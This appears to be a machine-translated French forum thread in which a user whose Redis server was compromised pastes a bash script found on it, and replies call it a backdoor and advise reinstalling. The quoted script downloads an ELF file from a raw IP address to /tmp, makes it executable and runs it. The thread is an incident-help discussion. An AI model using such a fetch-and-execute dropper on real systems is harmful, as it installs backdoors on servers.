Aujourd'hui, j'ai découvert que redis ne pouvait pas se connecter à un serveur. J'ai trouvé une telle instruction sur le serveur
.#!/bin/bash
zfile="/tmp/z.TF"
if [ ! -f "$zfile" ]; then
wget -P /tmp/ http://27.102.101.67/z.TF && chmod 777 /tmp/z.TF && /tmp/z.TF
fi
Téléchargé et exécuté le fichier z.TF Lors de l'ouverture de z.TF, tout est du bytecode. Ce programme peut être automatiquement réexécuté.
Actuellement, ce processus de programme est interrompu, mais le service Redis n'est toujours pas disponible. Je ne sais pas s'il reste d'autres programmes malveillants.
Quelqu'un peut-il expliquer le contenu de z.TF ? Et comment y faire face.
z.TF est un fichier exécutable Linux au format ELF
Votre serveur a une porte dérobée installée. Réinstallez le système dès que possible pour corriger la vulnérabilité.
Mettez à niveau tout ce qui doit être mis à niveau.
C'est essentiellement une porte dérobée + un gril
Au fait, merci de m'envoyer le code de t.ZF
N'avez-vous pas expliqué clairement le code que vous avez posté ?